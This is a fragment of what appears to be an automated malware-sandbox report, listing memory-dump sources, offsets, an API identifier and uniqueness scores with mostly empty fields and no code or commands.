                                                                                          • Source File: 00000004.00000002.496139536.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496529150.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496820004.0000000000BAD000.00000040.00000001.sdmp, Offset: 00BAD000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496820004.0000000000BAD000.00000040.00000001.sdmp, Offset: 00BAD000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496529150.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions